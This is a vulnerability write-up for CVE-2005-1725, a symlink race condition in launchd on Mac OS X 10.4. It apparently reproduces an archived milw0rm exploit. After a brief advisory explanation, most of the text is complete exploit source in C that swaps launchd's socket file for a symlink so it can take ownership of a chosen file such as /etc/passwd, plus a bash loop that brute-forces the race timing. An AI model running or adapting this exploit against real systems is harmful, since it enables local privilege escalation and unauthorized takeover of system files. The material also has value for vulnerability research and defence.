CVE-2005-1725

A local attacker can exploit this vulnerability by creating a symbolic link to a target file in a temporary directory that launchd uses. The exploit code then races with launchd to replace the socket file with the symbolic link. When launchd attempts to use the socket, it will instead operate on the target file specified by the symbolic link, leading to arbitrary file overwrite [ref_id=1].

The vulnerability lies within the launchd process in Apple Mac OS X 10.4.x up to 10.4.1. Specifically, the exploit targets the creation and use of a socket file located in `/var/launchd/` which is susceptible to symbolic link attacks due to its placement in a temporary directory [ref_id=1].

The advisory does not provide specific details about a patch or fix. However, the vulnerability is described as a race condition involving a socket file in a temporary directory. A proper fix would involve ensuring that temporary directories are created with secure permissions or that the socket file is created in a way that prevents symbolic link attacks.

# Apple Mac OSX 10.4 - launchd Race Condition Exploit

## Exploit

```c /* * Mac OS X 10.4 launchd race condition exploit * * intropy (intropy <at> caughq.org) */

/* .sh script to help with the offsets /str0ke #!/bin/bash

X=1000 Y=3000 I=1

while ((1)) do ./CAU-launchd /etc/passwd $X if [ $I -lt 30 ] then ((X=$X+$Y)) ((I=$I+1)) else X=1000 I=1 fi done */

#include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h>

#define DEBUG 0 #define SLEEP 6000

main(int argc, char *argv[]) { pid_t pid; int count, sleep = SLEEP; char name[100]; char target[100]; struct stat *stats = (struct stat *)malloc(sizeof(struct stat));

if ( argc < 2) { fprintf(stderr, "%s <file to 0wn>\n", argv[0]); exit(-1); } else if ( argc > 2 ) { sleep = atoi(argv[2]); strncpy(target, argv[1], sizeof(target)-1); } else { strncpy(target, argv[1], sizeof(target)-1); }

if ( DEBUG ) printf("Going for %s\n", target); if ( DEBUG ) printf("Using usleep %d\n", sleep);

pid = fork();

if ( pid == 0 ) { if ( DEBUG ) { system("/sbin/launchd -v /bin/ls -R /var/launchd/ 2>/dev/null"); } else { system("/sbin/launchd -v /bin/ls -R /var/launchd/ >/dev/null 2>&1"); } } else { snprintf(name, sizeof(name)-1, "/var/launchd/%d.%d/sock", getuid(), pid+2); if ( DEBUG ) printf("Checking %s\n", name); usleep(sleep); if ( DEBUG ) printf("Removing sock...\n"); if ( (unlink(name)) != 0 ) { if ( DEBUG ) perror("unlink"); } else { if ( (symlink(target, name)) != 0 ) { if ( DEBUG ) perror("symlink"); } else { if ( DEBUG ) printf("Created symlink %s -> %s...\n", name, target); } } stat(target, stats); if ( stats->st_uid == getuid() ) { printf("Looks like we got it\n"); usleep(10000000); } } }

// milw0rm.com [2005-06-14] ```

## Script to help with offsets

```bash #!/bin/bash

X=1000 Y=3000 I=1

while ((1)) do ./CAU-launchd /etc/passwd $X if [ $I -lt 30 ] then ((X=$X+$Y)) ((I=$I+1)) else X=1000 I=1 fi done ```